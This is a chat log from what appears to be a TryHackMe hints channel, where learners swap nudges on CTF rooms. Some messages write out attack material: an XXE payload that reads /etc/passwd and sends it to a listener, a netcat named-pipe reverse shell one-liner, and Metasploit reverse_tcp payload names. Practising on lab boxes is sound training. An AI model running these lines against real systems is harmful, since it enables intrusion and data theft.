#room-hints

*using

Please send a picture of your options.

If you are working on a Windows machine and are using Metasploit, it is currently defaulting to reverse_https payloads, which will likely not work.  Please set your payload manually for the time being to one of the following:

windows/x64/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp
windows/shell/reverse_tcp

If one of these do not work, we will be glad to help assist further.

Your payload is reverse https...

set payload <choose one from above>

okay

Also make sure the RPORT is actually the port of the website. I forget what port it actually is on, but verify that that is the port the website is running off of.

I namp the RHOST it is 8000 only for thast service.

can anyone give me a hand ive been on this questions for about an hour

im doing the gamerzone room and im doing task 6

I keep getting failed authentication

Okay @mild cargo . Try it.

okay @lean rover

@ebon kraken May I DM?

of course

Solved, issue was incorrectly set RPORT and RHOST.

Tank you @lean rover the issue is solved now.

*thank

Can someone give hint for wgel ctf. I have discovered the application and only two ports are there after scanning completely.

In the website too, there is only single source of sending an input which is not so helpful

is there something in higher ports?

there is not

Hey

Some hints plz

nvm

anyone play stuxCTF ?

@teal notch well what are common configuration file extensions on Linux/UNIX systems?

hello guys could you help me im stuck

hello guys could you help me im stuck
@vale aspen what is the first key you press to enter tmux commands

ctrl+b ? lol

what is first of those two

idk im a dummy

are you in a country where you read left to right or right to left?

left to right why?

then what is first of ctrl+b ?

or to put it more obviously: what is the full name of the key on your keyboard that is shorthanded to ctrl?

holy

omg thanks i wouldnt got it lol

thanks so much dude

Hello can someone help me ? I am stuck at the ctf 100 room at the end of stage 3 . I managed to found the image that has the login credentials . I tried to squeeze it and stretch it but nothing readable appeared.

Hi Everyone, this is my first time here

Can someone help me with Tryhackme web site? I am trying to use the in-browser Kali machine and deploy another machine to work with at the same time. How can I switch back and forth between 2 hosts without having to go through my room

@glacial mantle did you find the archive.zip password?

hey @stoic jewel any doubt with my stuxCTF machine?

Nah, all good. Figured it was worth an ask just incase someone had an idea
@steep oriole Did you manage to solve the custom wordlist question>?

Yes, I did @sand shuttle

@ocean wing keep trying, it is readable if you manipulate it right. Using gimp helped me.

@torn mural i figured it out gimp helmed me too thanks

looking for help on Cross-site Scripting
XSS Playground. I am stuck on the final question. TIA

@worn river what task?

I think the server just goes down..

@worn river there is a list with actions they block

check for one they dont

@spiral stag That I understand. The OWASP filter evasion cheat sheet has 105 options as is. Am I over looking something on the playground that might provide a hint? I assume it's going to be java based.

you should have used one of the others on the previous filter evations

but those are blocked now

try to think of others that arent

Hey guys, this might be really nooby but I'm stuck on flag16 of the linux challenges room. Could anyone give a hint?

@ruby junco I need some hint to get started.

You could ask a question and someone could help you.

You could check a writeup for the room as well. 🙂

Bless, didn't think of that for some reason 🙏

@spiral stag I am not having much luck with this. I pretty much used the same input on all 3 of the previous answers. Does that sound correct?

Trying to figure out the Vulnversity path. It states I need to navigate to 'payloads' and select the 'sniper' attack. You select 'sniper' attack from positions', not 'payloads'. Anyway, I've added my payload and everything and it is saying for the extensions I added all are blocked?

@glacial mantle did you find the archive.zip password?
@devout palm Nope. I gave up.

so im in the dir.. trying to make the test dir..

and getting a permission denied..

but looking at ls-la shiba3 should have the right permissions to write

@blazing ruin your home directory

ok I think I got it..

may be over thinking this.. but shouldnt i be able to run this since the critrea is met?

@blazing ruin What does the ./ do?

Alternatively, what does the error message say?

Yeah.. I'm virtual machine KALI and trying to exploit metasploit box. In task 5 , we have to get the session by using icecast exploit. But all the time session failed with an error REX::BindFailed The address is already in use or unavailable.
@mild cargo I'm having this same problem. It will create a jobs if I use run -j, but not exploit. And it's not creating sessions

@devout palm do you care if I DM you?

@blazing ruin not at all, but i'm semi-afk

no worries! im on your time.

@mild cargo I'm having this same problem. It will create a jobs if I use run -j, but not exploit. And it's not creating sessions
@tardy raptor check the pinned message

It might help

It might help
@glacial mantle I've tried all 3 payloads and still get this.

@glacial mantle I've tried all 3 payloads and still get this.
@tardy raptor Thats bad. I have no idea then.

I'll have to revisit later. I'm sleepy.

@tardy raptor Thats bad. I have no idea then.
@glacial mantle Thanks for trying

Can you take a screenshot of your options?

Did you try sessions instead of jobs?

Any hints on jack priv esc ? Apart from 'python'. I tried to find any writable crons but no luck.

In any way to exploit python module, i should look for a process owned by root, is it ?

@keen willow Yes, check out where python is installed

and look at the permissions

if someone has a few mins to walk through task 33 in the Linux room i would appericate it..at a loss..

What part are you having difficulties with?

have you tried using find command?

go through the find room for more help

Boom thanks! @glacial mantle @wispy girder

and look at the permissions
@proven bridge thanks pal, just rooted, feeling extremely encouraged.

@proven bridge thanks pal, just rooted, feeling extremely encouraged.
@keen willow Great to hear 🙂

how long is it going to take to get the password in Mr Robot room have been brute forcing almost 15min now i guess

??

how long is it going to take to get the password in Mr Robot room have been brute forcing almost 15min now i guess
@sinful plaza if its taking that long try increasing threads or may be you are doing something wrong

can i DM @rancid crystal

??

@sinful plaza i cant think of anything that you cant ask me here?

Also i am not on my VM so wont be of much help anyways

sure

i know am doing the right thing found dict in ||robots.txt || also am using wpscan username should be ||Elliot || my guess actually

Hello everyone

can i ask a question about dogcat?

just ask, if someone can help they will

@sinful plaza the brute force will take awhile, hint to speed it up is to ||sort the list by unique values||

Hey im pretty new to tryhackme and i was wondering if somewon coold give me a hint on how to find the version of the squid proxy thats running

@sinful plaza the brute force will take awhile, hint to speed it up is to ||sort the list by unique values||
@oblique cliff thanks man

any time

@sinful plaza another hint if you want it is ||you can discover what the username is, peek at what the error message is when you guess the wrong one||

kkkk thanks sure

kkkkkkkkkkk no problem

kkkkkkkkkkk no problem
@oblique cliff 😅 thanks bro

oh i see nevermind got it

Can you take a screenshot of your options?
@patent token

I need to log back in. I fell asleep last night

I have a reverse shell on a box as user www-data and ive found the creds for mysql - but when I try to run "mysql -u USERNAME -pPASSWORD" all that comes back is mysql: [Warning] Using a password on the command line interface can be insecure. Im not able to issue mysql commands after loging in like this....Does this not work because I need to upgrade my shell?

ok Ive been trying this for a while now and actually just figured out I can use the -e flag to execute commands in the same line as logging in....Im making progress now!

any hints on Daves blog? (got flag 1, somehow) bit lost on the next part running the commands on the page.

any hints for jeff?

brand new room @obsidian fog, doubt you'll see any hints for a while - personally, after barely scratching the surface on it in coming up on 2 hours, i'm going to bed 🙂

you probably arent going to get many hints for jeff as it literally just released and there may still be bloods

and yes, all the bloods are still there, nobody's got nothing!

oh yeah no one has solved it yet there wont be any help tonight or for a while

Ahh okay! I made some progress

and kind of stuck in a jail, not sure how to escape

Thanks though!

my pc froze became slow right as i got to the good bit

did you pop a shell @obsidian fog, cause I'm jealous if you did

I'm stuck on a problem in the Networking BP -- of the IP addresses that are reserved what are the first addresses typically reserved as? I've looked everywhere and have tried everything I could think of, but no dice. Anyone got a hint?

It's referring to what could be called a ___ ID

@safe fog oh! ok, I got it now. Thanks!

Did anyone make any progress on Jeff? Feels like everything I've found is a dead end

@median compass Yes i have a low level shell 🙂

but that shell is within dxxxxx

@safe fog Yes, i got a low-level shell within dxxxxx

Anyone got any hints on how to get a shell on Jeff

it looks like nobody's even submitted a flag yet lol

yeah I mean I was trying for like 2 hours and got nowhere except fucking with a dumb upload form

it's pretty hard

lol ya. action="#" and such

Did you spend time trying to figure out if the backend is set up for uploads?

JB, you are a cruel man

🤷‍♂️

Need some help with the Common Linux Privsec room. I'm at the msfvemon step and I deployed the script onto the host machine but I can't seem to connect to it at all.

commands I used https://pastebin.com/6Mf2q62W

I'm playing around in the xxe room shouldn't the below payload work for connection to a local webserver ? || <?xml version="1.0"?> <!DOCTYPE> <!ENTITY % payload SYSTEM "file:///etc/passwd"> <!ENTITY % param1 "<!ENTITY external SYSTEM 'http://TUN0-IP:8000/log_xxe?data=%payload;'>">> <root>&payload;</root>|| i do see the output but no request was sent to my local server

guys. what is the answer to the question: What kind of protocol is TCP? i completed the whole room but i cant get this one right.

What have you tried?

We are not allowed to give answers. THM is all about independence but we can give you a nudge

What havent i tried, ||Communication connection communications connection-oriented Transmission Transmission Transport||

O well I’ll just skip it then, bloody protocol names.

Have you checked write ups and or google

Have you looked at the ** in the field? the amount of stars typically shows the length of the word and format that should be entered

Yea I checked, I know the answer length. Tried different spelling. No luck, ill keep it unfinished as a constant reminder I had should have payed more attention in English class.

any one trying Jeff?

@wraith marsh nice work on the do***

you didnt leave many tools to work with 🙂

😛

any nudge on tempus_fugit_durius

?

apart from try harder 😋

Little.. more... info..?

Little.. more... info..?
@trim haven is that for me?

Yes...

Yes...
@trim haven haha i really like that naughty nudges, it forces me to take break and start thinking about the grammer, then google, them coffee.

I literally Have no clue as to what you are on

I literally Have no clue as to what you are on
@trim haven same here, i have no clue either 😋

Hmm, any hints for the task 2, #4 What number base could you use as a shorthand for base 2 (binary)? for this level ?: https://tryhackme.com/room/introtoresearch

Room name:
Task:

@trim haven me?

Everyone

I literally Have no clue as to what you are on
@trim haven Oh, ok, i am asking about tempus_fugit_durius

Room name: Introductory ResearchingIntroductory Researching
Task: 2
Question: #4
@trim haven

its pure ctf, user then root.

i've done it @keen willow, can you be a little less obscure about where you need a nudge, cause if it's just in general then I guess ... deploy the machine...

^

If anyone could help me :c

Give me 2 mins

Nvm I found the answer, it was base 16 (even if idk why :p)

@median compass O yes, i might need help in enumeration pal, need a clue to get in to start.

just enumerated everything but no luck

the website, upload, rpcbind, contact us.

Enumerate the upload some more @keen willow

@wraith marsh aye aye captain.

i hope burpsuit is enough for it.

it is @keen willow, you can even do it without

it is @keen willow, you can even do it without
@median compass Now i am getting worried. Alright thanks @median compass and @wraith marsh, give come back if needed.

happy hunting

Hi All, I was doing the "Year of the Fox" room earlier today. Found the root flag but couldn't decrypt the prize string most probably containing an email address. Have tried everything I could think of, just need a little hint 🙂

hmm

maybe go to the write up?

!

@heady anchor @round terrace it's not in the writeup -- mainly because the competition finished before the writeup was released.

You don't need to decode the email address now though

Yeah I know but just wanted to do it for the sake of completion

Also, @round terrace do you have a copy of the box up and rooted?

@heady anchor @round terrace it's not in the writeup -- mainly because the competition finished before the writeup was released.
@inland onyx oh ok i see...

@inland onyx Sorry, didnt get your point. I just deployed the vm from room

If so, I'll swap you. You run a command on the box and send me a screenshot, I'll give you a hint for the decoding? 😁

I terminated the VM will need to redeploy it

(Mainly because I don't have time to hack in myself)

Ah, that's OK then 😄

Don't worry

So you wont be giving the hint then 😅

Hehe, hex, base something, a rot cipher, and a reverse.

Not necessarily in that order

I decoded the hex64 didnt find anything after that, will try the remaining. Thanks

HELLO !! .. I'm stuck in ZTH: Obscure Web Vulns room:
task 18: JWT Challenge 3.5 "You know the drill, you're given a vulnerable application and there's a flag once you become admin. Good luck!" i did all the required encoding/decoding cookies but with no luck ,,, any idea ?? , ,,,, help please or HINT

and the website stuck after submitting admin token ,,, Mr. Admin any idea or hint??

anyone have tips for yoth?

ping me

hey, im doing the basic learn linux rooms, but for some reason, my putty denies my password for shiba1, any suggestions?

hey, im doing the basic learn linux rooms, but for some reason, my putty denies my password for shiba1, any suggestions?
@night quartz verbose ?

@night quartz Run SSH from a cmd prompt or terminal, you might aswell learn to do that asap

i should express that i managed to work through the entire learn linux course, the first one

i was just unable to do it using putty

but on task 43, the bonus challenge, the answer for that is only acquired via the use of putty

but if anyone has the answer i'l happily take it 🙂

telnet hates me

trying to get the reverse netcat shell: Task 7, Network Services Room

Any hints for the start of jeff?

read the tags?

I'll come back to it later

is something wrong with jeff challenge as when inserting ||admin|| page it does not appear nothing

?

i think it's supposed to do exactly what it's doing @echo thunder

ok so also the ||upload|| page is done on purpose

have to assume so yes

more evil that way

fun, i mean fun...

can you give us some hints on how to start

?

no one has even gotten the user flag yet, no hints at this point my friend, just keep looking, there are clues in what you're given

Web Scanning room, Task 3 question 7 and 8. Both are requiring to look at the Alerts, but after using Owasp Zap, only directory browing info shows up and nothing regarding cookies or XSS.

Looking for help with anyone familiar with XXS Playground. Question 4 Filter Evasion. TIA.

can you give us some hints on how to start
@wraith marsh ?

@vague parrot I believe we've been told that the tags for the room are all we need. We just need to up our enumeration game I suppose

@worn river i am also stuck XSS playground

@foggy lotus What area are you stuck on?

here..

any hint on jeff box? or if it is possible a liitle push in order to be on the right path

no one have rooted it yet.

Hint for Jeff: There’s no pavement in the wildwest.

I'm currently at stage 6 of the CTF 100 room and I'm stuck at Flag 75. I have to get the password for another user, which is in a file. I think I have the file, but it only says "Nothing to see" and the hint for this flag is "search the file". I tried a few things, but can't figure it out. Can somenone give me another hint?

@wraith marsh could I get a hint on how to get the reverse shell? I think I enumerated everything and my head now only contains tumbleweeds 😂

That’s just enumeration, keep trying. Run some gobuster

I found the ||encoder|| file, but it's 0kb

hint on the gobuster wordlist?

The most common word list used

2.3-medium

||-x php,html,c,asm,cpp,s,a|| or try harder?

You wouldn't search for .py in /images and you wouldn't search for .jpg in /snippets. Adapt and overcome

wonderland, i believe i get potential users when i get the door ?

@keen willow Somewhere down the rabbit hole

@fast swan the door comes after falling down the hole, or the hole comes after door, lol ? i thought i am already inside the hole.

What's with the lag on jeff anyway? Even on this shell it's slow with networking stuff

What's with the lag on jeff anyway? Even on this shell it's slow with networking stuff
@safe fog What OpenVPN server are you on?

US-West-VIP-1

It's unrealiable with wget, is that intended?

@keen willow If you're already down the rabbit hole, keep looking around the page and you will find what you're after

@safe fog is that the new VPN? I think 0day had problems with that issue (wget) too

I got no clue, somewhat new here. But yeah, it failed on 4 attempts then magically downloaded the file I wanted

Yeah, 0day had a few issues using curl/wget but I tried on mine( eu ) and was fine

It could be server Im not sure really

US-West-VIP-1
@safe fog That issue should now be fixed.

Sorry about that.

@keen willow If you're already down the rabbit hole, keep looking around the page and you will find what you're after
@fast swan i dont know why i always forgot to do that in first place rather to do it in the last. thanks pal.

@keen willow No worries haha. Couldn't give too much away on this hints page so I had to be really obscure as to not give it away haha

||-x php,html,c,asm,cpp,s,a|| or try harder?
@white salmon try smarter

Anyone any further on Jeff that could provide another hint? Or @wraith marsh have you got another riddle for us? haha

Am I going to be learning something new on root here, can't find anything useful. Found one interesting thing and appeared to be a dead end

You’ll learn to enumerate, which is probably the most important thing in Pentesting and you’ll learn a couple of things if you’re not too experienced

Anyone any further on Jeff that could provide another hint? Or @wraith marsh have you got another riddle for us? haha
@fast swan The Riddle You Have Already Rediscovers Down Every Road

lol

I hope you appreciate how hard that was

hello everyone, I am stuck, sorry i'm rather new to linux. I am in the Learn Linux room on the final step. just trying to finish the room and I cannot get to the flag that is in /root
I cannot change the file/directory permissions. I also tried escalating my own priv, unable to do that. Thought I could write a script and assign the owner as root then run the script. didnt seem to work
I'm not asking for the answer, but any hints would be greatly appreciated.

I hope you appreciate how hard that was
@wraith marsh Oh, I do. Much obliged, riddle master

@hazy sequoia look at which files each user owns

@oblique cliff thats the thing, all the directories are owned by root, the way I see the issue is permissions. root user has exclusive perms on root dir. group and other users have none, So I am just trying to figure is out if i'm overthinking the task or is there somewhere else i should be focusing besides the root dir

yes, look at which files each user owns on the machine

not just in the root directory

@oblique cliff ok will give it another go, been at it for hours. feelsbad

It's only hard in the beginning @hazy sequoia

I was stuck at that too, but that actually is a good hint

@wraith marsh any possible hints for root on Jeff. I've manually looked at nearly every file... and still only have one interesting thing ||backups||

For root?

Or initial?

If theres a user, then I'm gonna need a hint on that lol, cuase I'm only seeing one active account on here

Are you www-data?

yup

Ah, I gave a hint for that earlier

You need to figure out where you are and go from there

I'm guessing it's not normal to be in some sort of box in these labs is it? the kind a ship might be at

Well damn, I think I may know whats going on there but I still can't figure out initial! I swear I ain't sleeping until I've done Jeff tonight lmao

aaa pls hint on webserver yotf

@white salmon Where are you up to? Have you got initial?

did you get the user?

no

im on webserver

find the username

im in

like liturally inside the page

idk what to do

burp the page

look at the POST

i don't have burp

or zap

you need it

can it be done without it ?

or be a master at curl

o.O

why you don't have burp?

cuz i don't like it

you can use curl, but it's like 100 times harder

you know how to add headers in curl?

Anyone any further on Jeff that could provide another hint? Or @wraith marsh have you got another riddle for us? haha
@fast swan ||not always what comes next is the right way||

@white salmon @white salmon Maybe take a look at Postman too. Makes it easy to make requests, add headers, cookies, etc in a lightweight interface

im doing it manually

I've got a shell on jeff - Found the f* dets but can't figure out what to do from here ._.

Uploaded nc onto the box and tried to do things manually - Got the header and logged in but couldn't list files

@plush tapir When cracking, which wordlist did you use? If i can speed up to where you are, I may be able to help haha

@fast swan rockyou

Standard ctf wordlist :p

Damn, think my john is broken, it just finishes instantly on rockyou

did you x2john correctly?

Parameter is "john file.withhash --wordlist=path/to/rockyou.txt"

yeah, I did

PM me with what happened with your x2john to see if it hashed it properly

It's sorted now! Quick reinstall did the job, no idea what could have caused that though. It's cracking nicely now

\o/

"-w rockyou.txt", "--w rockyou.txt", "--wordlist rockyou.txt" and such will all fail. john is very finicky with its wordlist parameter...

any hint on Jeff in orde to start? I have found the directories but the files are 0 bytes

@echo thunder Many rabbit-holes

@plush tapir you missed the = before rockyou

@white salmon I know - I was showing examples of things that look correct, but won't work

It is the right way to search for files in source folder?

There are like 7 folders - Check them all

Ok

And be intelligent with your file extensions 🙂

Meh - Going to do some php coding to hopefully make my life easier with what I'm trying to do

Well I didn't make it all that far after john but at least I'm getting somewhere hahah

Nevermind lmao

Yea - You'll have gotten something pretty critical that you can use

@plush tapir Please can I DM you?

Sure

@plush tapir for the extension itis ok like php,html,c,cpp,s,S?

That would be expected extensions for source code

Uh-oh! You have had your machine deployed for too long.
... You know you've been fighting with a box for awhile when...

I am trying for 2 days now

anyone can give some hints regarding extensions to use in gobuster for Jeff?

@echo thunder Read the tags for the room is the only hint I can think of without giving it away

@fast swan Can I PM you

?

sure

I’m stuck here in deve’s blog.. a nudge for initial foothold? https://discordapp.com/channels/521382216299839518/522158539129618453/727188012546523188

I’m stuck here in deve’s blog.. a nudge for initial foothold? https://discordapp.com/channels/521382216299839518/522158539129618453/727188012546523188
@opaque ridge nevermind got it

anybody help me in ignite room task2.....i got the python script to get the user flag but cant getting root flag

??...

you need to find the password for root

a hint is on the website itself

i got that

but i cant getting the reverse shell

cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "ip" 4444 >/tmp/f"

i'm using this to get the reverse shell...but cant getiing anything on my nc listener

you don't need ""

run the nc reverse shell like so rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Tunnel IP> 4444 >/tmp/f

i have tried that also

did you set up a listener

but its also not working

yes

same port as in reverse shell?

nc -lvnp 4444

does it show any error?

cmd:"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.12.122 4444 >/tmp/f"
system
<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;">

<h4>A PHP Error was encountered</h4>

its showing this

huh, there shouldn't be any php involved..

that's strange

maybe try some other reverse shell http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

like bash, for example

okie le me try

@glossy basin can i dm ?

keep it here

i am not sure about your problem, to be honest

my best advice would be to start from scratch by re-deploying the machine

okie .......np......i will do this again

its works now......

any hint on how to find user.txt for Jeff room?

It’s in the usually directory

/home/<user>/user.txt

@wraith marsh I said I'd be up all night until it's done. I'm still trying lmao. Any hint on how to get out of the c******** (Don't know how to blur it out, sorry haha)

Hi @proven bridge

@proven bridge any hint from you regarding Jeff room

?

@wraith marsh can I PM you

?

@plush tapir may I DM you? I need a sanity check for the reverse shell of jeff 😅

@white pike You can me if you want, I'm upto priv esc

@fast swan can I join in ? 🙂

@fast swan can I join in ? 🙂
@mild eagle The more the merrier!

Might aswell give hints in public with spoiler tags

@fast swan how fare are you ?

Up to priv esc

@fast swan You're on the ||host machine||?

Yeah

@fast swan || so from the ftp and forward - I'm still stuck at the ftp||

@mild eagle Did you manage to ||upload||? I don't know if it's useful because I'm exactly there, but it's possible.

@mild eagle Did you manage to ||upload||? I don't know if it's useful because I'm exactly there, but it's possible.
@potent vale yup.. || via php ||

@fast swan || so from the ftp and forward - I'm still stuck at the ftp||
@mild eagle Same. But ||forward?|| I know I need to ||modify the ftp file|| but can't get anywhere else. Driving me crazy

@mild eagle Same. But ||forward?|| I know I need to ||modify the ftp file|| but can't get anywhere else. Driving me crazy
@fast swan || yes trying to ftp via metasploit but lacking in skills ie. i can upload via php but not execute any ftp commands :(||

My idea was to ||find the uploaded file|| but ||enumeration|| got me nowhere yet. Other idea was to ||root the container|| to ||edit the hosts file||.

So you got the ||ftp server|| working?

Yes, ||file upload|| works

So you got the ||ftp server|| working?
@fast swan || define work 😉 i can upload and the see a directory called files. but thats it. It create my own php file uploaded to wordpress site and executed through there ||

Yes, ||file upload|| works
@potent vale ||how did you connect to ftp||

Gotta say, it's a very well made room. Though it's a free room, it's giving me a run for my subscriber money lmao

By ||modifying the php file with the creds||. This is a little bit too much for "hints" I guess. We all need the same nudge though.

uhm ||there is python on the box||

Gah! I'm so confused!

Anyone doing Jeff room?

@echo thunder I'll tell you again

You need to ask your question

@lusty wigeon I know, but it only ||gave me a nicer shell||

i need a hint on how to escape docker on jeff

or how to get ssh access

@wraith marsh can you give us hint for jeff room? I have reverse shell and I am not able to get credentials for ssh, and now I am trying to make working the ftp file that is on the web server.Can you point me on the right direction please?

||If you're at FTP, you need to find a way to upload a shell while using a specific exploit. The hint is in the type of files it mentions in the FTP Password file.||

@echo thunder

@proven bridge I did not get it

You will have to ask @wraith marsh He mentions in his room to not give away much.

So I am respecting that wish.

I think I know how to escape the first container but I'll wait till I get back home

@wooden mist how did you get on the box? I have found 2 passwords but nothing for SSH

Uhh

||If you're at FTP, you need to find a way to upload a shell while using a specific exploit. The hint is in the type of files it mentions in the FTP Password file.||
@proven bridge Oh

||I got in via a revshell in a wp plugin||

I was looking for the ||wp|| location but couldn't find it, will use more tools

Tip: don't enumerate dirs

At least not in the first parts

Enumerate for files?

Nope

But that was helpful for the pass

Gonna give it another go

Yeah I have the ||wp|| password

Once you get a shell, is when the hardest part starts.

Webservers use this to serve different content depending on the host

The remainder of the room isn't hard.

Getting user is the most challenging.

Seems so

It’s also quite a common priv esc . It’s just this time it’s blind

@proven bridge I'm guessing what you mean with ||FTP Password file|| 🤔
The file you already have access to if you get a shell or is this a file you can get by accessing the service?

i'm still confused at the ||ftp|| part, i tried ||PUTing files but nothing seemed to work? i also tried GETing files (specifically the ones mentioned in the file)||

@digital iris which room?

jeff, continuing on from the above conversation ^^

@proven bridge I'm guessing what you mean with ||FTP Password file|| 🤔
The file you already have access to if you get a shell or is this a file you can get by accessing the service?
@white pike ||Yes, you need to access that service internally.||

@white pike ||Yes, you need to access that service internally.||
@proven bridge so is it like setting the whole ftp server..from the docker.. I never did that

@proven bridge so is it like setting the whole ftp server..from the docker.. I never did that
@indigo ridge Something like that, yes.

I need a hint on the bonus challenge of the Learn Linux room...

look at which files each user owns

Yeah, that's what I was doing. I must be missing something somewhere.

yep, just try looking at each of the files a bit closer 🙂

Looking for a hint on the "Jack-of-all-trades" CTF. Iv made it to the user flag and found what SUID I need to use for priv Escalation. I'm just unsure how I know what files are in root directory.

@winter plover if you just need the root flag, chances are it's just /root/root.txt

are you looking for something else?

yea. I read the write-ups and it didnt make sense how they knew that /root/root.txt was in that directory.. what if it was flag.txt

I was thinking of making a custom script to brute force it but wanted to check on here if i was missing something

ah, its just common practice that the flags are called user.txt and root.txt

but if youre unsure you could try to see if you can list out the directory and see what its called

Lol, I still don't get it. Only the root user/group has access to the file, of course. None of the other users seem to be on the sudoers list...

Yea.. that SUID doesn't list directories so I was wondering if anyone had any hints to view whats in that directory but if that is just a "common" practice that makes sense.. thank you bobloblaw

I can't add a user to the root group since I can't sudo. /etc/shadow is in the shadow group but I can't add a use to that either

@sharp whale dont look for who owns the root.txt

look at every file each user owns

a user may have something interesting

Well.... that's a lot of files

it is indeed

key to cyber security expert is enumeration 🙂

hello - looking for some assistance. I need to get a debugger installed on the room im working on. i already have a reverse shell as a regular user. i need gdb on the victim box, i can't install with apt b/c im not root, i've xfered the source code from my kali box to the victim and attempted to make/make install; and it fails (also fails on my THM kali vm for some reason). i have tried multiple versions of gdb source with the same issue. is there any type of stand along debugger that I could get on my kali box and then xfer to the victim so i can attach to a running process?????? i've been working on this for like 5 hours

I don't know what enumeration means

it means listing everything out and seeing what's there

@dense plume which room is this?

and is gdb not on there already?

its Dave's Blog

Oh, I did that

gdb is not installed on the victim vm by default

@oblique cliff gdb is not installed on the victim vm by default

i havent done dave's blog, so idk. Idk exactly what youre trying to do, if you need to debug a binary or something I'd say transfer it over to your attacker machine and do it there

well, i already xfered it to my machine and used ghidra to debug. i need to run the binary on the victim, attached to it with a debugger, and make a jump to a function that isn't normally accessible while its running

Ok, if there's a way to filter out all the "permission denied" results of the find command, I can't find it in the man page.

its so frustrating because i know exactly what i need to do, i just cant do it

@sharp whale try 2>/dev/null at the end of your command

ok

@dense plume sorry bud, havent done that room yet

That makes it go away - what is that doing?

@sharp whale the 2 is specifying errors the > is sending it to the location /dev/null

sending all the errors to the abyss

Well, I'm glad you guys are here because I never would have figured that out by myself!

Ok, I got it but... I still don't understand

Was there something that should have drawn my eye to that particular file?

I only looked at it because the other users didn't have one... which seems like a very brute-forcy reason to look at it

Tryhackme has a room all about the "the find command" and it shows how 2>/dev/null works if your interested. @sharp whale

Yeah that would be good

uh i dont actually remember anything about the file tbh, but i dont think its used in the room before that, so maybe you shouldve been drawn to that file cuz the room is basically a walkthrough and it doesnt use that file when its already used everything else

Yeah but it's in the ||/var|| directory and none of the other tasks/info refers to that directory at all. So I was wondering if I was missing something.

what room is it again?

Learn Linux

i did the room awhile back, but i dont remember why the file was important

For rooms like "Learn Linux" Youtube vids are not bad.. usually someone explains what command to use and why. It builds your knowledge and doesn't bore you to death reading manuals and docs.. for specifics.

I'll keep that in mind for future rooms.

I guess I just figured I was missing something because I got the answer by process of elimination and felt like that was the dumb-ass way to do it.

Felt like I was supposed to know what I was looking for - but I didn't

But maybe I wasn't supposed to know?

I started about 2 months ago and would set a time limit on a problem. If i couldn't get it after 2 hours of reading or searching. I would look at a guide to build my knowledge and save some time.

Yeah, the same strategy helped a lot when I was learning JavaScript

foothold for convertMyVideo hints?

||burp||

excuse you

@tidal sedge ||yea im using that, and I see it's creating a request as the youtube url appending your request as the video ID. Im not sure how I can exploit that though, can you give a bit of a bigger hint?||

nvm, i think i got something

@tidal sedge

🙂

foothold for convertMyVideo hints?
@oblique cliff ask for help

?

think logically

if it's an input field, what can you do?

according to OWASP vulns

just try different techniques (Hint: it's not sql injection)

@proven bridge Can it be s special exploit like this|| https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups/ || in Jeff

No

The privesc isn’t limited to specific extension

That’s a good hint for anybody trying to get Jeff

@wraith marsh tnx tried a lot things today learning a lot in doing so. 😀. But really wanna get to the next step 😀

In jeff box.. how do u begin to find out the ||ftp|| version and informations. it just shows ||Welcome to Jeff's FTP service|| 😐

you are mean mean person @wraith marsh xD

I know

Thank you.

is this supposed to be completely blind?

@hasty slate STAT

(if you doing it like me...ftp-ing)

is this supposed to be completely blind?
@hasty slate yes

(jeff) can connect to FTP, can't get anything to PUT... well, i guess i don't feel so bad because it looks like many people are stuck here as well

@white salmon Room, Task name

Any hint to start getting something useful on Blueprint?
So far I ||used Nmap to scan through all ports. I found that SMB and Apache running. I enumerated SMB using smbclient and smbmap and even msf but couldn't get anything useful. The first question asks me to to decrypt a hash but I can't even seem to find the user mentioned there. (Googling around, I mostly saw the NTLM vuln exists but not a way to exploit it. There was some issue with the software installed on Apache (8080), I tried some post requests (like to add myeslf as an admin, as I found in one exploit of the same version I believe), but I couldn't get anything fruitful.||
Maybe I'm just being stupid. A hint for where to look first would be greatly appreciated.

@__@

@cedar coral dm for a question?

np:)

payload? I don't even know how to make anyone do anything with the uploaded files 😩

Blueprint anyone?
https://tryhackme.com/room/blueprint
😫

Epsilon I'll help after I've finished my room

@white salmon I can uplad but i dont think i matters 🙂 havent been able to get any where with upload

Have you checked the associated writeups Epsilon?

Maybe you should research that service you found on 8080. That will lead you to victory.

I haven't checked the writeups, that'd be like accepting defeat XD

Okay, I'll check that port again...what about NTLM?

For real though about Jeff. Is the step from ||ftp|| a certain exploit that you just need to know? A lack of enumeration? An idea that you can come up with if you don't know the exploit? I'd rather finish the room with a hint instead of checking the solution in a writeup, but the learning experience is probably not worth putting much more time into it at this point.

It’s a common privesc

A privesc ||inside the container||?

Because I don't have a user yet

Play about with ftp

See what happens

@wraith marsh ohh ... we played with it ...

If you’ve not come across the privesc. Before you’ll struggle because it’s blind, but that’s why it’s rated hard 🤷‍♂️

has anyone here done WebAppSec101?

not sure what i'm supposed to do with Task4 Question 4. Think i might have jumped ahead cos i guessed admin login credentials

@wraith marsh sounds like it is a very specific exploit ? never read through so many cve-details before in one day 🙂

Uff it's beyond me for now, so I'm resorting to writeups

It’s not a cve

@wraith marsh no but got limit out everything 🙂 if I'm totally blank ... 🙂

a privesc on ||ftp??||

@safe fog I dont know but think so !

I think I'm out on this one then, I've never seen that, and googlefu is failing me to find something relevent.

@safe fog know the feeling gonna sleep on this one, used a bit to much time on this today 😄

Have you guys tried ||wildcards||?

ye

@potent vale more info ? but no ..

If anything happens with arbitrary filenames it could be using them in ||wildcards|| and there are ||privescs|| related to that.

Like, ||the host calling something like tar cf archive.tar /yourftpdirectory/*||

I can't even upload tho

It's possible to upload

I'm getting a connection refused on passive and port in use on active

You have to ||connect from your victim machine||.

||and I can also only upload to specific folder||

@potent vale are you past this step ?

I'm trying hard 😄

@potent vale good luck let me know or better yet give me a hint when you solve it I'm going to call it a day .. 🙂

Alright

i can upload .. but what now ufff...

what are you using to connect to the service?

::php::

python

in x86_64 , i am unable to understand below lines,

0x557b20e1d885 b e836feffff callq sym.imp.strtok ; char *strtok(char *s1, const char *s2)
| 0x557b20e1d88a b 488945b8 movq %rax, var_48h

Is there a way to search Tryhackme for the Windows box only? Thanks

what i understood is after calling strtok result comes in %rax and in the second line copying result to var_48h.

